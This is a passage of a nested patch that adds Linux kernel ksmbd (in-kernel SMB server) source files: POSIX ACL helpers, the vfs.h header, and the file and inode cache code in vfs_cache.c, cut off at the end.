++int ksmbd_vfs_posix_lock_wait_timeout(struct file_lock *flock, long timeout)
++{
++	return wait_event_interruptible_timeout(flock->fl_wait,
++						!flock->fl_blocker,
++						timeout);
++}
++
++void ksmbd_vfs_posix_lock_unblock(struct file_lock *flock)
++{
++	locks_delete_block(flock);
++}
++
++int ksmbd_vfs_set_init_posix_acl(struct user_namespace *user_ns,
++				 struct inode *inode)
++{
++	struct posix_acl_state acl_state;
++	struct posix_acl *acls;
++	int rc;
++
++	if (!IS_ENABLED(CONFIG_FS_POSIX_ACL))
++		return -EOPNOTSUPP;
++
++	ksmbd_debug(SMB, "Set posix acls\n");
++	rc = init_acl_state(&acl_state, 1);
++	if (rc)
++		return rc;
++
++	/* Set default owner group */
++	acl_state.owner.allow = (inode->i_mode & 0700) >> 6;
++	acl_state.group.allow = (inode->i_mode & 0070) >> 3;
++	acl_state.other.allow = inode->i_mode & 0007;
++	acl_state.users->aces[acl_state.users->n].uid = inode->i_uid;
++	acl_state.users->aces[acl_state.users->n++].perms.allow =
++		acl_state.owner.allow;
++	acl_state.groups->aces[acl_state.groups->n].gid = inode->i_gid;
++	acl_state.groups->aces[acl_state.groups->n++].perms.allow =
++		acl_state.group.allow;
++	acl_state.mask.allow = 0x07;
++
++	acls = posix_acl_alloc(6, GFP_KERNEL);
++	if (!acls) {
++		free_acl_state(&acl_state);
++		return -ENOMEM;
++	}
++	posix_state_to_acl(&acl_state, acls->a_entries);
++	rc = set_posix_acl(user_ns, inode, ACL_TYPE_ACCESS, acls);
++	if (rc < 0)
++		ksmbd_debug(SMB, "Set posix acl(ACL_TYPE_ACCESS) failed, rc : %d\n",
++			    rc);
++	else if (S_ISDIR(inode->i_mode)) {
++		posix_state_to_acl(&acl_state, acls->a_entries);
++		rc = set_posix_acl(user_ns, inode, ACL_TYPE_DEFAULT,
++				   acls);
++		if (rc < 0)
++			ksmbd_debug(SMB, "Set posix acl(ACL_TYPE_DEFAULT) failed, rc : %d\n",
++				    rc);
++	}
++	free_acl_state(&acl_state);
++	posix_acl_release(acls);
++	return rc;
++}
++
++int ksmbd_vfs_inherit_posix_acl(struct user_namespace *user_ns,
++				struct inode *inode, struct inode *parent_inode)
++{
++	struct posix_acl *acls;
++	struct posix_acl_entry *pace;
++	int rc, i;
++
++	if (!IS_ENABLED(CONFIG_FS_POSIX_ACL))
++		return -EOPNOTSUPP;
++
++	acls = get_acl(parent_inode, ACL_TYPE_DEFAULT);
++	if (!acls)
++		return -ENOENT;
++	pace = acls->a_entries;
++
++	for (i = 0; i < acls->a_count; i++, pace++) {
++		if (pace->e_tag == ACL_MASK) {
++			pace->e_perm = 0x07;
++			break;
++		}
++	}
++
++	rc = set_posix_acl(user_ns, inode, ACL_TYPE_ACCESS, acls);
++	if (rc < 0)
++		ksmbd_debug(SMB, "Set posix acl(ACL_TYPE_ACCESS) failed, rc : %d\n",
++			    rc);
++	if (S_ISDIR(inode->i_mode)) {
++		rc = set_posix_acl(user_ns, inode, ACL_TYPE_DEFAULT,
++				   acls);
++		if (rc < 0)
++			ksmbd_debug(SMB, "Set posix acl(ACL_TYPE_DEFAULT) failed, rc : %d\n",
++				    rc);
++	}
++	posix_acl_release(acls);
++	return rc;
++}
+diff --git a/fs/smb/server/vfs.h b/fs/smb/server/vfs.h
+new file mode 100644
+index 0000000000000..593059ca85112
+--- /dev/null
++++ b/fs/smb/server/vfs.h
+@@ -0,0 +1,167 @@
++/* SPDX-License-Identifier: GPL-2.0-or-later */
++/*
++ *   Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
++ *   Copyright (C) 2018 Samsung Electronics Co., Ltd.
++ */
++
++#ifndef __KSMBD_VFS_H__
++#define __KSMBD_VFS_H__
++
++#include <linux/file.h>
++#include <linux/fs.h>
++#include <linux/namei.h>
++#include <uapi/linux/xattr.h>
++#include <linux/posix_acl.h>
++#include <linux/unicode.h>
++
++#include "smbacl.h"
++#include "xattr.h"
++
++/*
++ * Enumeration for stream type.
++ */
++enum {
++	DATA_STREAM	= 1,	/* type $DATA */
++	DIR_STREAM		/* type $INDEX_ALLOCATION */
++};
++
++/* CreateOptions */
++#define CREATE_TREE_CONNECTION			cpu_to_le32(0x00000080)
++#define FILE_RESERVE_OPFILTER_LE		cpu_to_le32(0x00100000)
++
++#define CREATE_OPTION_READONLY			0x10000000
++/* system. NB not sent over wire */
++#define CREATE_OPTION_SPECIAL			0x20000000
++
++struct ksmbd_work;
++struct ksmbd_file;
++struct ksmbd_conn;
++
++struct ksmbd_dir_info {
++	const char	*name;
++	char		*wptr;
++	char		*rptr;
++	int		name_len;
++	int		out_buf_len;
++	int		num_entry;
++	int		data_count;
++	int		last_entry_offset;
++	bool		hide_dot_file;
++	int		flags;
++	int		last_entry_off_align;
++};
++
++struct ksmbd_readdir_data {
++	struct dir_context	ctx;
++	union {
++		void		*private;
++		char		*dirent;
++	};
++
++	unsigned int		used;
++	unsigned int		dirent_count;
++	unsigned int		file_attr;
++	struct unicode_map	*um;
++};
++
++/* ksmbd kstat wrapper to get valid create time when reading dir entry */
++struct ksmbd_kstat {
++	struct kstat		*kstat;
++	unsigned long long	create_time;
++	__le32			file_attributes;
++};
++
++int ksmbd_vfs_lock_parent(struct user_namespace *user_ns, struct dentry *parent,
++			  struct dentry *child);
++int ksmbd_vfs_may_delete(struct user_namespace *user_ns, struct dentry *dentry);
++int ksmbd_vfs_query_maximal_access(struct user_namespace *user_ns,
++				   struct dentry *dentry, __le32 *daccess);
++int ksmbd_vfs_create(struct ksmbd_work *work, const char *name, umode_t mode);
++int ksmbd_vfs_mkdir(struct ksmbd_work *work, const char *name, umode_t mode);
++int ksmbd_vfs_read(struct ksmbd_work *work, struct ksmbd_file *fp,
++		   size_t count, loff_t *pos);
++int ksmbd_vfs_write(struct ksmbd_work *work, struct ksmbd_file *fp,
++		    char *buf, size_t count, loff_t *pos, bool sync,
++		    ssize_t *written);
++int ksmbd_vfs_fsync(struct ksmbd_work *work, u64 fid, u64 p_id);
++int ksmbd_vfs_remove_file(struct ksmbd_work *work, char *name);
++int ksmbd_vfs_link(struct ksmbd_work *work,
++		   const char *oldname, const char *newname);
++int ksmbd_vfs_getattr(const struct path *path, struct kstat *stat);
++int ksmbd_vfs_fp_rename(struct ksmbd_work *work, struct ksmbd_file *fp,
++			char *newname);
++int ksmbd_vfs_truncate(struct ksmbd_work *work,
++		       struct ksmbd_file *fp, loff_t size);
++struct srv_copychunk;
++int ksmbd_vfs_copy_file_ranges(struct ksmbd_work *work,
++			       struct ksmbd_file *src_fp,
++			       struct ksmbd_file *dst_fp,
++			       struct srv_copychunk *chunks,
++			       unsigned int chunk_count,
++			       unsigned int *chunk_count_written,
++			       unsigned int *chunk_size_written,
++			       loff_t  *total_size_written);
++ssize_t ksmbd_vfs_listxattr(struct dentry *dentry, char **list);
++ssize_t ksmbd_vfs_getxattr(struct user_namespace *user_ns,
++			   struct dentry *dentry,
++			   char *xattr_name,
++			   char **xattr_buf);
++ssize_t ksmbd_vfs_casexattr_len(struct user_namespace *user_ns,
++				struct dentry *dentry, char *attr_name,
++				int attr_name_len);
++int ksmbd_vfs_setxattr(struct user_namespace *user_ns,
++		       struct dentry *dentry, const char *attr_name,
++		       void *attr_value, size_t attr_size, int flags);
++int ksmbd_vfs_xattr_stream_name(char *stream_name, char **xattr_stream_name,
++				size_t *xattr_stream_name_size, int s_type);
++int ksmbd_vfs_remove_xattr(struct user_namespace *user_ns,
++			   struct dentry *dentry, char *attr_name);
++int ksmbd_vfs_kern_path(struct ksmbd_work *work,
++			char *name, unsigned int flags, struct path *path,
++			bool caseless);
++struct dentry *ksmbd_vfs_kern_path_create(struct ksmbd_work *work,
++					  const char *name,
++					  unsigned int flags,
++					  struct path *path);
++int ksmbd_vfs_empty_dir(struct ksmbd_file *fp);
++void ksmbd_vfs_set_fadvise(struct file *filp, __le32 option);
++int ksmbd_vfs_zero_data(struct ksmbd_work *work, struct ksmbd_file *fp,
++			loff_t off, loff_t len);
++struct file_allocated_range_buffer;
++int ksmbd_vfs_fqar_lseek(struct ksmbd_file *fp, loff_t start, loff_t length,
++			 struct file_allocated_range_buffer *ranges,
++			 unsigned int in_count, unsigned int *out_count);
++int ksmbd_vfs_unlink(struct user_namespace *user_ns,
++		     struct dentry *dir, struct dentry *dentry);
++void *ksmbd_vfs_init_kstat(char **p, struct ksmbd_kstat *ksmbd_kstat);
++int ksmbd_vfs_fill_dentry_attrs(struct ksmbd_work *work,
++				struct user_namespace *user_ns,
++				struct dentry *dentry,
++				struct ksmbd_kstat *ksmbd_kstat);
++void ksmbd_vfs_posix_lock_wait(struct file_lock *flock);
++int ksmbd_vfs_posix_lock_wait_timeout(struct file_lock *flock, long timeout);
++void ksmbd_vfs_posix_lock_unblock(struct file_lock *flock);
++int ksmbd_vfs_remove_acl_xattrs(struct user_namespace *user_ns,
++				struct dentry *dentry);
++int ksmbd_vfs_remove_sd_xattrs(struct user_namespace *user_ns,
++			       struct dentry *dentry);
++int ksmbd_vfs_set_sd_xattr(struct ksmbd_conn *conn,
++			   struct user_namespace *user_ns,
++			   struct dentry *dentry,
++			   struct smb_ntsd *pntsd, int len);
++int ksmbd_vfs_get_sd_xattr(struct ksmbd_conn *conn,
++			   struct user_namespace *user_ns,
++			   struct dentry *dentry,
++			   struct smb_ntsd **pntsd);
++int ksmbd_vfs_set_dos_attrib_xattr(struct user_namespace *user_ns,
++				   struct dentry *dentry,
++				   struct xattr_dos_attrib *da);
++int ksmbd_vfs_get_dos_attrib_xattr(struct user_namespace *user_ns,
++				   struct dentry *dentry,
++				   struct xattr_dos_attrib *da);
++int ksmbd_vfs_set_init_posix_acl(struct user_namespace *user_ns,
++				 struct inode *inode);
++int ksmbd_vfs_inherit_posix_acl(struct user_namespace *user_ns,
++				struct inode *inode,
++				struct inode *parent_inode);
++#endif /* __KSMBD_VFS_H__ */
+diff --git a/fs/smb/server/vfs_cache.c b/fs/smb/server/vfs_cache.c
+new file mode 100644
+index 0000000000000..0ae5dd0829e92
+--- /dev/null
++++ b/fs/smb/server/vfs_cache.c
+@@ -0,0 +1,708 @@
++// SPDX-License-Identifier: GPL-2.0-or-later
++/*
++ * Copyright (C) 2016 Namjae Jeon <linkinjeon@kernel.org>
++ * Copyright (C) 2019 Samsung Electronics Co., Ltd.
++ */
++
++#include <linux/fs.h>
++#include <linux/slab.h>
++#include <linux/vmalloc.h>
++
++#include "glob.h"
++#include "vfs_cache.h"
++#include "oplock.h"
++#include "vfs.h"
++#include "connection.h"
++#include "mgmt/tree_connect.h"
++#include "mgmt/user_session.h"
++#include "smb_common.h"
++
++#define S_DEL_PENDING			1
++#define S_DEL_ON_CLS			2
++#define S_DEL_ON_CLS_STREAM		8
++
++static unsigned int inode_hash_mask __read_mostly;
++static unsigned int inode_hash_shift __read_mostly;
++static struct hlist_head *inode_hashtable __read_mostly;
++static DEFINE_RWLOCK(inode_hash_lock);
++
++static struct ksmbd_file_table global_ft;
++static atomic_long_t fd_limit;
++static struct kmem_cache *filp_cache;
++
++void ksmbd_set_fd_limit(unsigned long limit)
++{
++	limit = min(limit, get_max_files());
++	atomic_long_set(&fd_limit, limit);
++}
++
++static bool fd_limit_depleted(void)
++{
++	long v = atomic_long_dec_return(&fd_limit);
++
++	if (v >= 0)
++		return false;
++	atomic_long_inc(&fd_limit);
++	return true;
++}
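++
++/*
++ * The decrement-then-undo pattern above keeps the check lock-free:
++ * atomic_long_dec_return() optimistically claims a slot, and only
++ * when the counter has gone negative (no slots left) is the slot
++ * returned with atomic_long_inc() before reporting depletion.
++ */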
++
++static void fd_limit_close(void)
++{
++	atomic_long_inc(&fd_limit);
++}
++
++/*
++ * INODE hash
++ */
++
++static unsigned long inode_hash(struct super_block *sb, unsigned long hashval)
++{
++	unsigned long tmp;
++
++	tmp = (hashval * (unsigned long)sb) ^ (GOLDEN_RATIO_PRIME + hashval) /
++		L1_CACHE_BYTES;
++	tmp = tmp ^ ((tmp ^ GOLDEN_RATIO_PRIME) >> inode_hash_shift);
++	return tmp & inode_hash_mask;
++}
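++
++/*
++ * Mixing sketch for inode_hash() above: the superblock pointer and
++ * inode number are folded with GOLDEN_RATIO_PRIME so that
++ * consecutive inode numbers spread across buckets; the result is
++ * masked to one of the 16384 hlist heads set up by
++ * ksmbd_inode_hash_init() (inode_hash_shift == 14).
++ */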
++
++static struct ksmbd_inode *__ksmbd_inode_lookup(struct inode *inode)
++{
++	struct hlist_head *head = inode_hashtable +
++		inode_hash(inode->i_sb, inode->i_ino);
++	struct ksmbd_inode *ci = NULL, *ret_ci = NULL;
++
++	hlist_for_each_entry(ci, head, m_hash) {
++		if (ci->m_inode == inode) {
++			if (atomic_inc_not_zero(&ci->m_count))
++				ret_ci = ci;
++			break;
++		}
++	}
++	return ret_ci;
++}
++
++static struct ksmbd_inode *ksmbd_inode_lookup(struct ksmbd_file *fp)
++{
++	return __ksmbd_inode_lookup(file_inode(fp->filp));
++}
++
++static struct ksmbd_inode *ksmbd_inode_lookup_by_vfsinode(struct inode *inode)
++{
++	struct ksmbd_inode *ci;
++
++	read_lock(&inode_hash_lock);
++	ci = __ksmbd_inode_lookup(inode);
++	read_unlock(&inode_hash_lock);
++	return ci;
++}
++
++int ksmbd_query_inode_status(struct inode *inode)
++{
++	struct ksmbd_inode *ci;
++	int ret = KSMBD_INODE_STATUS_UNKNOWN;
++
++	read_lock(&inode_hash_lock);
++	ci = __ksmbd_inode_lookup(inode);
++	if (ci) {
++		ret = KSMBD_INODE_STATUS_OK;
++		if (ci->m_flags & S_DEL_PENDING)
++			ret = KSMBD_INODE_STATUS_PENDING_DELETE;
++		atomic_dec(&ci->m_count);
++	}
++	read_unlock(&inode_hash_lock);
++	return ret;
++}
++
++bool ksmbd_inode_pending_delete(struct ksmbd_file *fp)
++{
++	return (fp->f_ci->m_flags & S_DEL_PENDING);
++}
++
++void ksmbd_set_inode_pending_delete(struct ksmbd_file *fp)
++{
++	fp->f_ci->m_flags |= S_DEL_PENDING;
++}
++
++void ksmbd_clear_inode_pending_delete(struct ksmbd_file *fp)
++{
++	fp->f_ci->m_flags &= ~S_DEL_PENDING;
++}
++
++void ksmbd_fd_set_delete_on_close(struct ksmbd_file *fp,
++				  int file_info)
++{
++	if (ksmbd_stream_fd(fp)) {
++		fp->f_ci->m_flags |= S_DEL_ON_CLS_STREAM;
++		return;
++	}
++
++	fp->f_ci->m_flags |= S_DEL_ON_CLS;
++}
++
++static void ksmbd_inode_hash(struct ksmbd_inode *ci)
++{
++	struct hlist_head *b = inode_hashtable +
++		inode_hash(ci->m_inode->i_sb, ci->m_inode->i_ino);
++
++	hlist_add_head(&ci->m_hash, b);
++}
++
++static void ksmbd_inode_unhash(struct ksmbd_inode *ci)
++{
++	write_lock(&inode_hash_lock);
++	hlist_del_init(&ci->m_hash);
++	write_unlock(&inode_hash_lock);
++}
++
++static int ksmbd_inode_init(struct ksmbd_inode *ci, struct ksmbd_file *fp)
++{
++	ci->m_inode = file_inode(fp->filp);
++	atomic_set(&ci->m_count, 1);
++	atomic_set(&ci->op_count, 0);
++	atomic_set(&ci->sop_count, 0);
++	ci->m_flags = 0;
++	ci->m_fattr = 0;
++	INIT_LIST_HEAD(&ci->m_fp_list);
++	INIT_LIST_HEAD(&ci->m_op_list);
++	rwlock_init(&ci->m_lock);
++	return 0;
++}
++
++static struct ksmbd_inode *ksmbd_inode_get(struct ksmbd_file *fp)
++{
++	struct ksmbd_inode *ci, *tmpci;
++	int rc;
++
++	read_lock(&inode_hash_lock);
++	ci = ksmbd_inode_lookup(fp);
++	read_unlock(&inode_hash_lock);
++	if (ci)
++		return ci;
++
++	ci = kmalloc(sizeof(struct ksmbd_inode), GFP_KERNEL);
++	if (!ci)
++		return NULL;
++
++	rc = ksmbd_inode_init(ci, fp);
++	if (rc) {
++		pr_err("inode initialization failed\n");
++		kfree(ci);
++		return NULL;
++	}
++
++	write_lock(&inode_hash_lock);
++	tmpci = ksmbd_inode_lookup(fp);
++	if (!tmpci) {
++		ksmbd_inode_hash(ci);
++	} else {
++		kfree(ci);
++		ci = tmpci;
++	}
++	write_unlock(&inode_hash_lock);
++	return ci;
++}
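++
++/*
++ * The lookup/insert sequence above is a double-checked pattern: the
++ * first lookup under the read lock avoids allocating in the common
++ * case, and the second lookup under the write lock handles the race
++ * where another thread hashed the same inode in between, in which
++ * case the freshly allocated ci is discarded in favor of tmpci.
++ */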
++
++static void ksmbd_inode_free(struct ksmbd_inode *ci)
++{
++	ksmbd_inode_unhash(ci);
++	kfree(ci);
++}
++
++static void ksmbd_inode_put(struct ksmbd_inode *ci)
++{
++	if (atomic_dec_and_test(&ci->m_count))
++		ksmbd_inode_free(ci);
++}
++
++int __init ksmbd_inode_hash_init(void)
++{
++	unsigned int loop;
++	unsigned long numentries = 16384;
++	unsigned long bucketsize = sizeof(struct hlist_head);
++	unsigned long size;
++
++	inode_hash_shift = ilog2(numentries);
++	inode_hash_mask = (1 << inode_hash_shift) - 1;
++
++	size = bucketsize << inode_hash_shift;
++
++	/* init the ksmbd inode hash table */
++	inode_hashtable = vmalloc(size);
++	if (!inode_hashtable)
++		return -ENOMEM;
++
++	for (loop = 0; loop < (1U << inode_hash_shift); loop++)
++		INIT_HLIST_HEAD(&inode_hashtable[loop]);
++	return 0;
++}
++
++void ksmbd_release_inode_hash(void)
++{
++	vfree(inode_hashtable);
++}
++
++static void __ksmbd_inode_close(struct ksmbd_file *fp)
++{
++	struct dentry *dir, *dentry;
++	struct ksmbd_inode *ci = fp->f_ci;
++	int err;
++	struct file *filp;
++
++	filp = fp->filp;
++	if (ksmbd_stream_fd(fp) && (ci->m_flags & S_DEL_ON_CLS_STREAM)) {
++		ci->m_flags &= ~S_DEL_ON_CLS_STREAM;
++		err = ksmbd_vfs_remove_xattr(file_mnt_user_ns(filp),
++					     filp->f_path.dentry,
++					     fp->stream.name);
++		if (err)
++			pr_err("remove xattr failed : %s\n",
++			       fp->stream.name);
++	}
++
++	if (atomic_dec_and_test(&ci->m_count)) {
++		write_lock(&ci->m_lock);
++		if (ci->m_flags & (S_DEL_ON_CLS | S_DEL_PENDING)) {
++			dentry = filp->f_path.dentry;
++			dir = dentry->d_parent;
++			ci->m_flags &= ~(S_DEL_ON_CLS | S_DEL_PENDING);
++			write_unlock(&ci->m_lock);
++			ksmbd_vfs_unlink(file_mnt_user_ns(filp), dir, dentry);
++			write_lock(&ci->m_lock);
++		}
++		write_unlock(&ci->m_lock);
++
++		ksmbd_inode_free(ci);
++	}
++}
++
++static void __ksmbd_remove_durable_fd(struct ksmbd_file *fp)
++{
++	if (!has_file_id(fp->persistent_id))
++		return;
++
++	write_lock(&global_ft.lock);
++	idr_remove(global_ft.idr, fp->persistent_id);
++	write_unlock(&global_ft.lock);
++}
++
++static void __ksmbd_remove_fd(struct ksmbd_file_table *ft, struct ksmbd_file *fp)
++{
++	if (!has_file_id(fp->volatile_id))
++		return;
++
++	write_lock(&fp->f_ci->m_lock);
++	list_del_init(&fp->node);
++	write_unlock(&fp->f_ci->m_lock);
++
++	write_lock(&ft->lock);
++	idr_remove(ft->idr, fp->volatile_id);
++	write_unlock(&ft->lock);
++}
++
++static void __ksmbd_close_fd(struct ksmbd_file_table *ft, struct ksmbd_file *fp)
++{
++	struct file *filp;
++	struct ksmbd_lock *smb_lock, *tmp_lock;
++
++	fd_limit_close();
++	__ksmbd_remove_durable_fd(fp);
++	__ksmbd_remove_fd(ft, fp);
++
++	close_id_del_oplock(fp);
++	filp = fp->filp;
++
++	__ksmbd_inode_close(fp);
++	if (!IS_ERR_OR_NULL(filp))
++		fput(filp);
++
++	/* Because the reference count of fp is 0, it is guaranteed that
++	 * nothing else can access fp->lock_list anymore.
++	 */
++	list_for_each_entry_safe(smb_lock, tmp_lock, &fp->lock_list, flist) {
++		spin_lock(&fp->conn->llist_lock);
++		list_del(&smb_lock->clist);
++		spin_unlock(&fp->conn->llist_lock);
++
++		list_del(&smb_lock->flist);
++		locks_free_lock(smb_lock->fl);
++		kfree(smb_lock);
++	}
++
++	if (ksmbd_stream_fd(fp))
++		kfree(fp->stream.name);
++	kmem_cache_free(filp_cache, fp);
++}
++
++static struct ksmbd_file *ksmbd_fp_get(struct ksmbd_file *fp)
++{
++	if (!atomic_inc_not_zero(&fp->refcount))
++		return NULL;
++	return fp;
++}
++
++static struct ksmbd_file *__ksmbd_lookup_fd(struct ksmbd_file_table *ft,
++					    u64 id)
++{
++	struct ksmbd_file *fp;
++
++	if (!has_file_id(id))
++		return NULL;
++
++	read_lock(&ft->lock);
++	fp = idr_find(ft->idr, id);
++	if (fp)
++		fp = ksmbd_fp_get(fp);
++	read_unlock(&ft->lock);
++	return fp;
++}
++
++static void __put_fd_final(struct ksmbd_work *work, struct ksmbd_file *fp)
++{
++	__ksmbd_close_fd(&work->sess->file_table, fp);
++	atomic_dec(&work->conn->stats.open_files_count);
++}
++
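++/*
++ * Mark every request blocked on this file (e.g. a pending byte-range
++ * lock) as closed and run its cancel callback, so the waiters abort
++ * instead of touching a file that is being torn down.
++ */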
++static void set_close_state_blocked_works(struct ksmbd_file *fp)
++{
++	struct ksmbd_work *cancel_work;
++
++	spin_lock(&fp->f_lock);
++	list_for_each_entry(cancel_work, &fp->blocked_works,
++				 fp_entry) {
++		cancel_work->state = KSMBD_WORK_CLOSED;
++		cancel_work->cancel_fn(cancel_work->cancel_argv);
++	}
++	spin_unlock(&fp->f_lock);
++}
++
++int ksmbd_close_fd(struct ksmbd_work *work, u64 id)
++{
++	struct ksmbd_file	*fp;
++	struct ksmbd_file_table	*ft;
++
++	if (!has_file_id(id))
++		return 0;
++
++	ft = &work->sess->file_table;
++	read_lock(&ft->lock);
++	fp = idr_find(ft->idr, id);
++	if (fp) {
++		set_close_state_blocked_works(fp);
++
++		if (!atomic_dec_and_test(&fp->refcount))
++			fp = NULL;
++	}
++	read_unlock(&ft->lock);
++
++	if (!fp)
++		return -EINVAL;
++
++	__put_fd_final(work, fp);
++	return 0;
++}
++
++void ksmbd_fd_put(struct ksmbd_work *work, struct ksmbd_file *fp)
++{
++	if (!fp)
++		return;
++
++	if (!atomic_dec_and_test(&fp->refcount))
++		return;
++	__put_fd_final(work, fp);
++}
++
++static bool __sanity_check(struct ksmbd_tree_connect *tcon, struct ksmbd_file *fp)
++{
++	if (!fp)
++		return false;
++	if (fp->tcon != tcon)
++		return false;
++	return true;
++}
++
++struct ksmbd_file *ksmbd_lookup_foreign_fd(struct ksmbd_work *work, u64 id)
++{
++	return __ksmbd_lookup_fd(&work->sess->file_table, id);
++}
++
++struct ksmbd_file *ksmbd_lookup_fd_fast(struct ksmbd_work *work, u64 id)
++{
++	struct ksmbd_file *fp = __ksmbd_lookup_fd(&work->sess->file_table, id);
++
++	if (__sanity_check(work->tcon, fp))
++		return fp;
++
++	ksmbd_fd_put(work, fp);
++	return NULL;
++}
++
++struct ksmbd_file *ksmbd_lookup_fd_slow(struct ksmbd_work *work, u64 id,
++					u64 pid)
++{
++	struct ksmbd_file *fp;
++
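++	/*
++	 * A related (compounded) request carries an all-0xFF FileId; fall
++	 * back to the ids cached from the preceding CREATE in the chain.
++	 */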
++	if (!has_file_id(id)) {
++		id = work->compound_fid;
++		pid = work->compound_pfid;
++	}
++
++	fp = __ksmbd_lookup_fd(&work->sess->file_table, id);
++	if (!__sanity_check(work->tcon, fp)) {
++		ksmbd_fd_put(work, fp);
++		return NULL;
++	}
++	if (fp->persistent_id != pid) {
++		ksmbd_fd_put(work, fp);
++		return NULL;
++	}
++	return fp;
++}
++
++struct ksmbd_file *ksmbd_lookup_durable_fd(unsigned long long id)
++{
++	return __ksmbd_lookup_fd(&global_ft, id);
++}
++
++struct ksmbd_file *ksmbd_lookup_fd_cguid(char *cguid)
++{
++	struct ksmbd_file	*fp = NULL;
++	unsigned int		id;
++
++	read_lock(&global_ft.lock);
++	idr_for_each_entry(global_ft.idr, fp, id) {
++		if (!memcmp(fp->create_guid,
++			    cguid,
++			    SMB2_CREATE_GUID_SIZE)) {
++			fp = ksmbd_fp_get(fp);
++			break;
++		}
++	}
++	read_unlock(&global_ft.lock);
++
++	return fp;
++}
++
++struct ksmbd_file *ksmbd_lookup_fd_inode(struct inode *inode)
++{
++	struct ksmbd_file	*lfp;
++	struct ksmbd_inode	*ci;
++
++	ci = ksmbd_inode_lookup_by_vfsinode(inode);
++	if (!ci)
++		return NULL;
++
++	read_lock(&ci->m_lock);
++	list_for_each_entry(lfp, &ci->m_fp_list, node) {
++		if (inode == file_inode(lfp->filp)) {
++			atomic_dec(&ci->m_count);
++			lfp = ksmbd_fp_get(lfp);
++			read_unlock(&ci->m_lock);
++			return lfp;
++		}
++	}
++	atomic_dec(&ci->m_count);
++	read_unlock(&ci->m_lock);
++	return NULL;
++}
++
++#define OPEN_ID_TYPE_VOLATILE_ID	(0)
++#define OPEN_ID_TYPE_PERSISTENT_ID	(1)
++
++static void __open_id_set(struct ksmbd_file *fp, u64 id, int type)
++{
++	if (type == OPEN_ID_TYPE_VOLATILE_ID)
++		fp->volatile_id = id;
++	if (type == OPEN_ID_TYPE_PERSISTENT_ID)
++		fp->persistent_id = id;
++}
++
++static int __open_id(struct ksmbd_file_table *ft, struct ksmbd_file *fp,
++		     int type)
++{
++	u64			id = 0;
++	int			ret;
++
++	if (type == OPEN_ID_TYPE_VOLATILE_ID && fd_limit_depleted()) {
++		__open_id_set(fp, KSMBD_NO_FID, type);
++		return -EMFILE;
++	}
++
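++	/*
++	 * Preload IDR nodes while sleeping is still allowed; the actual
++	 * allocation below runs under ft->lock, hence GFP_NOWAIT.
++	 */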
++	idr_preload(GFP_KERNEL);
++	write_lock(&ft->lock);
++	ret = idr_alloc_cyclic(ft->idr, fp, 0, INT_MAX - 1, GFP_NOWAIT);
++	if (ret >= 0) {
++		id = ret;
++		ret = 0;
++	} else {
++		id = KSMBD_NO_FID;
++		fd_limit_close();
++	}
++
++	__open_id_set(fp, id, type);
++	write_unlock(&ft->lock);
++	idr_preload_end();
++	return ret;
++}
++
++unsigned int ksmbd_open_durable_fd(struct ksmbd_file *fp)
++{
++	__open_id(&global_ft, fp, OPEN_ID_TYPE_PERSISTENT_ID);
++	return fp->persistent_id;
++}
++
++struct ksmbd_file *ksmbd_open_fd(struct ksmbd_work *work, struct file *filp)
++{
++	struct ksmbd_file *fp;
++	int ret;
++
++	fp = kmem_cache_zalloc(filp_cache, GFP_KERNEL);
++	if (!fp) {
++		pr_err("Failed to allocate memory\n");
++		return ERR_PTR(-ENOMEM);
++	}
++
++	INIT_LIST_HEAD(&fp->blocked_works);
++	INIT_LIST_HEAD(&fp->node);
++	INIT_LIST_HEAD(&fp->lock_list);
++	spin_lock_init(&fp->f_lock);
++	atomic_set(&fp->refcount, 1);
++
++	fp->filp		= filp;
++	fp->conn		= work->conn;
++	fp->tcon		= work->tcon;
++	fp->volatile_id		= KSMBD_NO_FID;
++	fp->persistent_id	= KSMBD_NO_FID;
++	fp->f_ci		= ksmbd_inode_get(fp);
++
++	if (!fp->f_ci) {
++		ret = -ENOMEM;
++		goto err_out;
++	}
++
++	ret = __open_id(&work->sess->file_table, fp, OPEN_ID_TYPE_VOLATILE_ID);
++	if (ret) {
++		ksmbd_inode_put(fp->f_ci);
++		goto err_out;
++	}
++
++	atomic_inc(&work->conn->stats.open_files_count);
++	return fp;
++
++err_out:
++	kmem_cache_free(filp_cache, fp);
++	return ERR_PTR(ret);
++}
++
++static int
++__close_file_table_ids(struct ksmbd_file_table *ft,
++		       struct ksmbd_tree_connect *tcon,
++		       bool (*skip)(struct ksmbd_tree_connect *tcon,
++				    struct ksmbd_file *fp))
++{
++	unsigned int			id;
++	struct ksmbd_file		*fp;
++	int				num = 0;
++
++	idr_for_each_entry(ft->idr, fp, id) {
++		if (skip(tcon, fp))
++			continue;
++
++		set_close_state_blocked_works(fp);
++
++		if (!atomic_dec_and_test(&fp->refcount))
++			continue;
++		__ksmbd_close_fd(ft, fp);
++		num++;
++	}
++	return num;
++}
++
++static bool tree_conn_fd_check(struct ksmbd_tree_connect *tcon,
++			       struct ksmbd_file *fp)
++{
++	return fp->tcon != tcon;
++}
++
++static bool session_fd_check(struct ksmbd_tree_connect *tcon,
++			     struct ksmbd_file *fp)
++{
++	return false;
++}
++
++void ksmbd_close_tree_conn_fds(struct ksmbd_work *work)
++{
++	int num = __close_file_table_ids(&work->sess->file_table,
++					 work->tcon,
++					 tree_conn_fd_check);
++
++	atomic_sub(num, &work->conn->stats.open_files_count);
++}
++
++void ksmbd_close_session_fds(struct ksmbd_work *work)
++{
++	int num = __close_file_table_ids(&work->sess->file_table,
++					 work->tcon,
++					 session_fd_check);
++
++	atomic_sub(num, &work->conn->stats.open_files_count);
++}
++
++int ksmbd_init_global_file_table(void)
++{
++	return ksmbd_init_file_table(&global_ft);
++}
++
++void ksmbd_free_global_file_table(void)
++{
++	struct ksmbd_file	*fp = NULL;
++	unsigned int		id;
++
++	idr_for_each_entry(global_ft.idr, fp, id) {
++		__ksmbd_remove_durable_fd(fp);
++		kmem_cache_free(filp_cache, fp);
++	}
++
++	ksmbd_destroy_file_table(&global_ft);
++}
++
++int ksmbd_init_file_table(struct ksmbd_file_table *ft)
++{
++	ft->idr = kzalloc(sizeof(struct idr), GFP_KERNEL);
++	if (!ft->idr)
++		return -ENOMEM;
++
++	idr_init(ft->idr);
++	rwlock_init(&ft->lock);
++	return 0;
++}
++
++void ksmbd_destroy_file_table(struct ksmbd_file_table *ft)
++{
++	if (!ft->idr)
++		return;
++
++	__close_file_table_ids(ft, NULL, session_fd_check);
++	idr_destroy(ft->idr);
++	kfree(ft->idr);
++	ft->idr = NULL;
++}
++
++int ksmbd_init_file_cache(void)
++{
